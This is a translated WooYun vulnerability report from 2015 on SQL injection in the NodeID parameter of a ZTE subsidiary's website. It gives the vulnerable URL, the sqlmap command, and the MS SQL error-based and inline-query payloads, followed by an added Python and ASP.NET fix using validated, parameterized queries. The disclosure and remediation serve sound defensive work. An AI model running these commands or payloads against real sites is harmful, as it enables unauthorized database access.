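Vulnerability Summary

Bug ID: wooyun-2015-095507

Title: SQL injection vulnerability in a ZTE sub-site

Vendor: ZTE Corporation (中兴通讯股份有限公司)

Author: 中央军

Submitted: 2015-02-04 17:22

Fixed: 2015-03-21 17:24

Made public: 2015-03-21 17:24

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Confirmed by the vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]

Tags: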


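Vulnerability Details

Disclosure status:

2015-02-04: Details sent to the vendor; waiting for the vendor to handle them
2015-02-05: Vendor confirmed; details disclosed to the vendor only
2015-02-15: Details disclosed to core white hats and experts in related fields
2015-02-25: Details disclosed to regular white hats
2015-03-07: Details disclosed to intern white hats
2015-03-21: Details disclosed to the public

Brief description:

Detailed description: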

http://www.zte-v.com.cn

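ZTE Changtian Information Technology (Nanchang) Co., Ltd. (中兴长天信息技术(南昌)有限公司) is a high-tech company within the ZTE group. It mainly develops software and hardware products for RFID, water resources and WSN, provides comprehensive, systematic application solutions for water resources, RFID and WSN, and its R&D team has more than ten years of experience with informatization solutions.
The site has a SQL injection vulnerability. The affected location: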

http://www.zte-v.com.cn/Plus/SubForm.aspx?FID=2&NodeID=35

The NodeID parameter is the vulnerable one.

sqlmap.py -u "http://www.zte-v.com.cn/Plus/SubForm.aspx?FID=2&NodeID=35" -p NodeID --dbs


sqlmap identified the following injection points with a total of 104 HTTP(s) requests:
---
Place: GET
Parameter: NodeID
Type: error-based
Title: Microsoft SQL Server/Sybase error-based - Parameter replace
Payload: FID=2&NodeID=(CONVERT(INT,(SELECT CHAR(113)+CHAR(105)+CHAR(101)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (3317=3317) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(115)+CHAR(121)+CHAR(113))))
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: FID=2&NodeID=(SELECT CHAR(113)+CHAR(105)+CHAR(101)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (9401=9401) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(115)+CHAR(121)+CHAR(113))
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 0
back-end DBMS: Microsoft SQL Server 2008
available databases [69]:


69 databases, I'm not going to run it any further!

Proof of vulnerability:

Fix:
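
The sqlmap findings above ("Parameter replace", "inline queries") mean the whole NodeID value is evaluated as an SQL expression, which is what happens when a numeric parameter is concatenated into the query text. The following added example (not from the report or the vendor) shows that pattern next to the fix, strict integer validation plus a bound parameter. SQLite stands in for SQL Server here, and the table, column and function names are hypothetical.

```python
import sqlite3

# Constructed stand-in data: SQLite replaces the SQL Server back end named in
# the report, and the table and column names are hypothetical.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE nodes (node_id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO nodes VALUES (35, 'Contact form'), (36, 'Internal draft');
    """)
    return db

def lookup_vulnerable(db, node_id):
    # Vulnerable pattern: the raw query-string value is pasted into a numeric
    # position, so the database parses it as an SQL expression, not a value.
    sql = "SELECT title FROM nodes WHERE node_id = " + node_id
    return db.execute(sql).fetchone()

def parse_id(raw, max_digits=9):
    # Allowlist: ASCII decimal digits only, with a bounded length.
    if not (raw.isascii() and raw.isdigit() and len(raw) <= max_digits):
        raise ValueError("id must be a decimal integer")
    return int(raw)

def lookup_safe(db, node_id):
    # Hardened pattern: validate first, then bind the integer as a parameter
    # so it can never be interpreted as SQL text.
    sql = "SELECT title FROM nodes WHERE node_id = ?"
    return db.execute(sql, (parse_id(node_id),)).fetchone()

def demo():
    db = make_db()
    benign_expression = "(SELECT 35+1)"  # constructed, harmless subquery
    results = {"vulnerable": lookup_vulnerable(db, benign_expression)}
    try:
        lookup_safe(db, benign_expression)
    except ValueError as exc:
        results["safe"] = str(exc)
    results["normal"] = lookup_safe(db, "35")
    return results

if __name__ == "__main__":
    print(demo())
```

In ASP.NET the equivalent is `int.TryParse` on the query-string value followed by a `SqlParameter` of type `SqlDbType.Int`.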

Copyright notice: when reposting, please credit the source 中央军@乌云 (WooYun)


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-02-05 13:40

Vendor reply:

Thanks~

Latest status:

None